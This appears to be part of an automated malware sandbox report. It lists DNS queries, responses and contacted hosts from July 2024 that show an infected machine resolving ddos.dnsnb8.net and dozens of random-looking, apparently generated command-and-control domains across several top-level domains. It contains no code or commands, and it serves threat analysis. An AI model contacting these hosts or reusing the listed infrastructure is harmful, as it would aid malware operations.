                                                                                                                                                                                                                        Jul 25, 2024 15:16:14.771421909 CEST192.168.2.61.1.1.10xd8d5Standard query (0)iuirshriuisruruuf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:16:15.896528006 CEST192.168.2.61.1.1.10x91e7Standard query (0)afeifieuuufufufuf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:16:17.022145987 CEST192.168.2.61.1.1.10x32c9Standard query (0)srndndubsbsifurfd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:16:18.161525011 CEST192.168.2.61.1.1.10x1ddbStandard query (0)fiiauediehduefuge.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:16:18.470674992 CEST192.168.2.61.1.1.10x1ddbStandard query (0)fiiauediehduefuge.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:16:19.661390066 CEST192.168.2.61.1.1.10xd87fStandard query (0)nousiieiffgogogoo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:16:20.785829067 CEST192.168.2.61.1.1.10x3f02Standard query (0)fifiehsueuufidhfi.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:16:23.254614115 CEST192.168.2.61.1.1.10x5779Standard query (0)eofihsishihiursgu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:16:24.395832062 CEST192.168.2.61.1.1.10x5dabStandard query (0)nnososoosjfeuhueu.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:16:25.536344051 CEST192.168.2.61.1.1.10x1b62Standard query (0)ssofhoseuegsgrfnj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:16:26.661854029 CEST192.168.2.61.1.1.10x319cStandard query (0)slpsrgpsrhojifdij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:16:27.818262100 CEST192.168.2.61.1.1.10x3ad4Standard query (0)aiiaiafrzrueuedur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:16:28.989650011 CEST192.168.2.61.1.1.10xa8baStandard query (0)fuaiuebndieufeufu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:16:29.299026966 CEST192.168.2.61.1.1.10xa8baStandard query (0)fuaiuebndieufeufu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:16:31.676738024 CEST192.168.2.61.1.1.10x53d7Standard query (0)eiifngjfksisiufjf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:16:32.832775116 CEST192.168.2.61.1.1.10xa3c9Standard query (0)eoroooskfogihisrg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:16:33.988774061 CEST192.168.2.61.1.1.10x8f77Standard query (0)noeuaoenriusfiruu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:16:35.193286896 CEST192.168.2.61.1.1.10x5675Standard query (0)iuirshriuisruruuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:16:36.332726002 CEST192.168.2.61.1.1.10xb2d3Standard query (0)afeifieuuufufufuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:16:58.976277113 CEST192.168.2.61.1.1.10xe359Standard query (0)srndndubsbsifurfd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:17:00.271507025 CEST192.168.2.61.1.1.10xcddeStandard query (0)fiiauediehduefuge.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:17:00.581366062 CEST192.168.2.61.1.1.10xcddeStandard query (0)fiiauediehduefuge.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:17:01.832855940 CEST192.168.2.61.1.1.10xa871Standard query (0)nousiieiffgogogoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:17:02.146177053 CEST192.168.2.61.1.1.10xa871Standard query (0)nousiieiffgogogoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:17:03.146320105 CEST192.168.2.61.1.1.10xa871Standard query (0)nousiieiffgogogoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:17:04.270579100 CEST192.168.2.61.1.1.10x599aStandard query (0)fifiehsueuufidhfi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:17:06.379900932 CEST192.168.2.61.1.1.10x2872Standard query (0)eofihsishihiursgu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:17:07.552309036 CEST192.168.2.61.1.1.10x93eaStandard query (0)nnososoosjfeuhueu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:17:07.861299038 CEST192.168.2.61.1.1.10x93eaStandard query (0)nnososoosjfeuhueu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:17:11.082887888 CEST192.168.2.61.1.1.10xba10Standard query (0)slpsrgpsrhojifdij.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:17:12.207854033 CEST192.168.2.61.1.1.10x22e5Standard query (0)aiiaiafrzrueuedur.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:17:12.517626047 CEST192.168.2.61.1.1.10x22e5Standard query (0)aiiaiafrzrueuedur.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:17:13.713542938 CEST192.168.2.61.1.1.10x8c3eStandard query (0)fuaiuebndieufeufu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:17:16.928518057 CEST192.168.2.61.1.1.10x6220Standard query (0)eoroooskfogihisrg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:17:19.942061901 CEST192.168.2.61.1.1.10xf449Standard query (0)iuirshriuisruruuf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:17:21.083864927 CEST192.168.2.61.1.1.10xdb3fStandard query (0)afeifieuuufufufuf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:17:22.225972891 CEST192.168.2.61.1.1.10x5083Standard query (0)srndndubsbsifurfd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:17:23.415957928 CEST192.168.2.61.1.1.10xec04Standard query (0)fiiauediehduefuge.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:17:24.552949905 CEST192.168.2.61.1.1.10x8abStandard query (0)nousiieiffgogogoo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:17:28.536509037 CEST192.168.2.61.1.1.10xa5fbStandard query (0)eofihsishihiursgu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                        Jul 25, 2024 15:13:19.451169968 CEST1.1.1.1192.168.2.60xf2a9No error (0)ddos.dnsnb8.net44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:13:41.555955887 CEST1.1.1.1192.168.2.60x350No error (0)ssofhoseuegsgrfnu.ru170.39.226.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:13:41.556565046 CEST1.1.1.1192.168.2.60x350No error (0)ssofhoseuegsgrfnu.ru170.39.226.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:13:42.754754066 CEST1.1.1.1192.168.2.60xe56fNo error (0)ww88.ssofhoseuegsgrfnu.ru86537.BODIS.COMCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:13:42.754754066 CEST1.1.1.1192.168.2.60xe56fNo error (0)86537.BODIS.COM199.59.243.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:14:07.002186060 CEST1.1.1.1192.168.2.60xaaacNo error (0)slpsrgpsrhojifdij.ru92.246.89.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:14:30.005697012 CEST1.1.1.1192.168.2.60xef23No error (0)aiiaiafrzrueuedur.ru92.246.89.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:14:39.196909904 CEST1.1.1.1192.168.2.60xbe91Name error (3)fuaiuebndieufeufu.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:14:40.575145960 CEST1.1.1.1192.168.2.60xe39bName error (3)eiifngjfksisiufjf.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:14:41.853352070 CEST1.1.1.1192.168.2.60xf43bName error (3)eoroooskfogihisrg.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:14:43.075299025 CEST1.1.1.1192.168.2.60x193aName error (3)noeuaoenriusfiruu.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:14:44.449604034 CEST1.1.1.1192.168.2.60x1f52Name error (3)iuirshriuisruruuf.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:14:45.855427027 CEST1.1.1.1192.168.2.60x128eName error (3)afeifieuuufufufuf.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:14:47.028892040 CEST1.1.1.1192.168.2.60xb3afName error (3)srndndubsbsifurfd.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:14:48.610685110 CEST1.1.1.1192.168.2.60xabd9No error (0)fiiauediehduefuge.ru44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:14:50.328067064 CEST1.1.1.1192.168.2.60xf091Name error (3)nousiieiffgogogoo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:14:51.529253960 CEST1.1.1.1192.168.2.60x71a1Name error (3)fifiehsueuufidhfi.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:14:52.697886944 CEST1.1.1.1192.168.2.60xc6b9Name error (3)eofihsishihiursgu.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:14:53.908288956 CEST1.1.1.1192.168.2.60xe295Name error (3)nnososoosjfeuhueu.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:14:55.234798908 CEST1.1.1.1192.168.2.60x676bNo error (0)ssofhoseuegsgrfnj.su92.246.89.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:00.414899111 CEST1.1.1.1192.168.2.60x7a0eName error (3)slpsrgpsrhojifdij.sunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:01.625380993 CEST1.1.1.1192.168.2.60x72e0Name error (3)aiiaiafrzrueuedur.sunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:02.889776945 CEST1.1.1.1192.168.2.60x313fName error (3)fuaiuebndieufeufu.sunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:04.096728086 CEST1.1.1.1192.168.2.60x6e37Name error (3)eiifngjfksisiufjf.sunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:05.274229050 CEST1.1.1.1192.168.2.60xb8edName error (3)eoroooskfogihisrg.sunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:06.450229883 CEST1.1.1.1192.168.2.60xa674Name error (3)noeuaoenriusfiruu.sunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:07.652426004 CEST1.1.1.1192.168.2.60x7fb1Name error (3)iuirshriuisruruuf.sunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:09.405515909 CEST1.1.1.1192.168.2.60x3fd7No error (0)afeifieuuufufufuf.su92.246.89.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:14.613394022 CEST1.1.1.1192.168.2.60x8162Name error (3)srndndubsbsifurfd.sunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:15.823622942 CEST1.1.1.1192.168.2.60xae44Name error (3)fiiauediehduefuge.sunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:17.031714916 CEST1.1.1.1192.168.2.60xae2bName error (3)nousiieiffgogogoo.sunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:18.194735050 CEST1.1.1.1192.168.2.60xe3fbName error (3)fifiehsueuufidhfi.sunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:19.404558897 CEST1.1.1.1192.168.2.60x66beName error (3)eofihsishihiursgu.sunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:20.624769926 CEST1.1.1.1192.168.2.60xa40Name error (3)nnososoosjfeuhueu.sunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:22.121957064 CEST1.1.1.1192.168.2.60x4783No error (0)ssofhoseuegsgrfnj.in208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:23.766561031 CEST1.1.1.1192.168.2.60x820eName error (3)slpsrgpsrhojifdij.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:25.408566952 CEST1.1.1.1192.168.2.60x3195Name error (3)aiiaiafrzrueuedur.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:26.563381910 CEST1.1.1.1192.168.2.60x60b8Name error (3)fuaiuebndieufeufu.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:27.866024971 CEST1.1.1.1192.168.2.60xbbf0No error (0)eiifngjfksisiufjf.in44.213.104.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:29.547326088 CEST1.1.1.1192.168.2.60x5887Name error (3)eoroooskfogihisrg.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:30.849684000 CEST1.1.1.1192.168.2.60x1ee1Name error (3)noeuaoenriusfiruu.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:32.734591961 CEST1.1.1.1192.168.2.60x1235No error (0)iuirshriuisruruuf.in44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:34.453625917 CEST1.1.1.1192.168.2.60x52c2Name error (3)afeifieuuufufufuf.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:35.817830086 CEST1.1.1.1192.168.2.60x6f4dName error (3)srndndubsbsifurfd.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:36.952613115 CEST1.1.1.1192.168.2.60x2f71Name error (3)fiiauediehduefuge.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:38.077578068 CEST1.1.1.1192.168.2.60x3652Name error (3)nousiieiffgogogoo.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:39.219974041 CEST1.1.1.1192.168.2.60x90bbName error (3)fifiehsueuufidhfi.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:40.361435890 CEST1.1.1.1192.168.2.60x3829Name error (3)eofihsishihiursgu.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:41.502330065 CEST1.1.1.1192.168.2.60x4d2bName error (3)nnososoosjfeuhueu.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:42.643661022 CEST1.1.1.1192.168.2.60x4364Name error (3)ssofhoseuegsgrfnj.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:43.970180988 CEST1.1.1.1192.168.2.60x1eadNo error (0)slpsrgpsrhojifdij.net13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:46.673913002 CEST1.1.1.1192.168.2.60x60b4No error (0)aiiaiafrzrueuedur.net185.215.113.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:48.614532948 CEST1.1.1.1192.168.2.60x6c65Name error (3)fuaiuebndieufeufu.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:49.752501011 CEST1.1.1.1192.168.2.60x83bName error (3)eiifngjfksisiufjf.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:50.916500092 CEST1.1.1.1192.168.2.60x3c3dName error (3)eoroooskfogihisrg.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:52.047518969 CEST1.1.1.1192.168.2.60xc6bcName error (3)noeuaoenriusfiruu.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:53.175554991 CEST1.1.1.1192.168.2.60x5404Name error (3)iuirshriuisruruuf.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:54.312077999 CEST1.1.1.1192.168.2.60x5e49Name error (3)afeifieuuufufufuf.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:55.440915108 CEST1.1.1.1192.168.2.60x2a3dName error (3)srndndubsbsifurfd.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:56.912908077 CEST1.1.1.1192.168.2.60x996bName error (3)fiiauediehduefuge.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:56.922616005 CEST1.1.1.1192.168.2.60x996bName error (3)fiiauediehduefuge.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:15:58.222551107 CEST1.1.1.1192.168.2.60x22f5No error (0)nousiieiffgogogoo.net18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:16:00.752420902 CEST1.1.1.1192.168.2.60xd5d4Name error (3)fifiehsueuufidhfi.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:16:02.071814060 CEST1.1.1.1192.168.2.60x1a03No error (0)eofihsishihiursgu.net44.213.104.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:16:03.870702982 CEST1.1.1.1192.168.2.60x1d26No error (0)ssofhoseuegsgrfnj.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:16:05.717729092 CEST1.1.1.1192.168.2.60x7254Name error (3)slpsrgpsrhojifdij.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:16:06.920284986 CEST1.1.1.1192.168.2.60xf629Name error (3)aiiaiafrzrueuedur.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:16:08.047108889 CEST1.1.1.1192.168.2.60xf2b7Name error (3)fuaiuebndieufeufu.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:16:09.702545881 CEST1.1.1.1192.168.2.60x42e2No error (0)eiifngjfksisiufjf.biz34.218.204.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:16:11.545438051 CEST1.1.1.1192.168.2.60x63aeName error (3)eoroooskfogihisrg.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:16:12.850660086 CEST1.1.1.1192.168.2.60x9fe7No error (0)noeuaoenriusfiruu.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:16:14.781003952 CEST1.1.1.1192.168.2.60xd8d5Name error (3)iuirshriuisruruuf.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:16:15.907104969 CEST1.1.1.1192.168.2.60x91e7Name error (3)afeifieuuufufufuf.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:16:17.036204100 CEST1.1.1.1192.168.2.60x32c9Name error (3)srndndubsbsifurfd.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:16:18.547014952 CEST1.1.1.1192.168.2.60x1ddbName error (3)fiiauediehduefuge.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:16:18.547034025 CEST1.1.1.1192.168.2.60x1ddbName error (3)fiiauediehduefuge.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:16:19.672938108 CEST1.1.1.1192.168.2.60xd87fName error (3)nousiieiffgogogoo.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:16:20.971801996 CEST1.1.1.1192.168.2.60x3f02No error (0)fifiehsueuufidhfi.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:16:23.268949032 CEST1.1.1.1192.168.2.60x5779Name error (3)eofihsishihiursgu.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:16:24.421735048 CEST1.1.1.1192.168.2.60x5dabName error (3)nnososoosjfeuhueu.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:16:25.547086954 CEST1.1.1.1192.168.2.60x1b62Name error (3)ssofhoseuegsgrfnj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:16:26.699956894 CEST1.1.1.1192.168.2.60x319cName error (3)slpsrgpsrhojifdij.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:16:27.854243994 CEST1.1.1.1192.168.2.60x3ad4Name error (3)aiiaiafrzrueuedur.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:16:29.667366028 CEST1.1.1.1192.168.2.60xa8baNo error (0)fuaiuebndieufeufu.com54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:16:29.667426109 CEST1.1.1.1192.168.2.60xa8baNo error (0)fuaiuebndieufeufu.com54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:16:31.708091974 CEST1.1.1.1192.168.2.60x53d7Name error (3)eiifngjfksisiufjf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:16:32.867100000 CEST1.1.1.1192.168.2.60xa3c9Name error (3)eoroooskfogihisrg.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:16:34.064666033 CEST1.1.1.1192.168.2.60x8f77Name error (3)noeuaoenriusfiruu.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:16:35.205379009 CEST1.1.1.1192.168.2.60x5675Name error (3)iuirshriuisruruuf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:16:36.356127977 CEST1.1.1.1192.168.2.60xb2d3No error (0)afeifieuuufufufuf.com74.119.239.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:16:59.144759893 CEST1.1.1.1192.168.2.60xe359Name error (3)srndndubsbsifurfd.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:17:00.713849068 CEST1.1.1.1192.168.2.60xcddeName error (3)fiiauediehduefuge.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:17:00.714055061 CEST1.1.1.1192.168.2.60xcddeName error (3)fiiauediehduefuge.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:17:03.151489019 CEST1.1.1.1192.168.2.60xa871Name error (3)nousiieiffgogogoo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:17:03.154779911 CEST1.1.1.1192.168.2.60xa871Name error (3)nousiieiffgogogoo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:17:03.156706095 CEST1.1.1.1192.168.2.60xa871Name error (3)nousiieiffgogogoo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:17:04.484365940 CEST1.1.1.1192.168.2.60x599aNo error (0)fifiehsueuufidhfi.com54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:17:06.430552959 CEST1.1.1.1192.168.2.60x2872Name error (3)eofihsishihiursgu.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:17:07.928505898 CEST1.1.1.1192.168.2.60x93eaName error (3)nnososoosjfeuhueu.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:17:07.928594112 CEST1.1.1.1192.168.2.60x93eaName error (3)nnososoosjfeuhueu.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:17:11.092981100 CEST1.1.1.1192.168.2.60xba10Name error (3)slpsrgpsrhojifdij.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:17:12.584923029 CEST1.1.1.1192.168.2.60x22e5Name error (3)aiiaiafrzrueuedur.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:17:12.584997892 CEST1.1.1.1192.168.2.60x22e5Name error (3)aiiaiafrzrueuedur.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:17:13.724020958 CEST1.1.1.1192.168.2.60x8c3eName error (3)fuaiuebndieufeufu.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:17:16.942445040 CEST1.1.1.1192.168.2.60x6220Name error (3)eoroooskfogihisrg.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:17:19.954668045 CEST1.1.1.1192.168.2.60xf449Name error (3)iuirshriuisruruuf.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:17:21.095153093 CEST1.1.1.1192.168.2.60xdb3fName error (3)afeifieuuufufufuf.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:17:22.272984982 CEST1.1.1.1192.168.2.60x5083Name error (3)srndndubsbsifurfd.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:17:23.427980900 CEST1.1.1.1192.168.2.60xec04Name error (3)fiiauediehduefuge.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:17:24.569910049 CEST1.1.1.1192.168.2.60x8abName error (3)nousiieiffgogogoo.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jul 25, 2024 15:17:28.697144032 CEST1.1.1.1192.168.2.60xa5fbName error (3)eofihsishihiursgu.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        • ddos.dnsnb8.net:799
                                                                                                                                                                                                                        • ssofhoseuegsgrfnu.ru
                                                                                                                                                                                                                        • ww88.ssofhoseuegsgrfnu.ru
                                                                                                                                                                                                                        • 92.63.197.48
                                                                                                                                                                                                                        • slpsrgpsrhojifdij.ru
                                                                                                                                                                                                                        • aiiaiafrzrueuedur.ru
                                                                                                                                                                                                                        • fiiauediehduefuge.ru
                                                                                                                                                                                                                        • ssofhoseuegsgrfnj.su
                                                                                                                                                                                                                        • afeifieuuufufufuf.su
                                                                                                                                                                                                                        • ssofhoseuegsgrfnj.in
                                                                                                                                                                                                                        • eiifngjfksisiufjf.in
                                                                                                                                                                                                                        • iuirshriuisruruuf.in
                                                                                                                                                                                                                        • slpsrgpsrhojifdij.net
                                                                                                                                                                                                                        • aiiaiafrzrueuedur.net
                                                                                                                                                                                                                        • nousiieiffgogogoo.net
                                                                                                                                                                                                                        • eofihsishihiursgu.net
                                                                                                                                                                                                                        • ssofhoseuegsgrfnj.biz
                                                                                                                                                                                                                        • eiifngjfksisiufjf.biz
                                                                                                                                                                                                                        • noeuaoenriusfiruu.biz
                                                                                                                                                                                                                        • fifiehsueuufidhfi.biz
                                                                                                                                                                                                                        • fuaiuebndieufeufu.com
                                                                                                                                                                                                                        • afeifieuuufufufuf.com
                                                                                                                                                                                                                        • fifiehsueuufidhfi.com
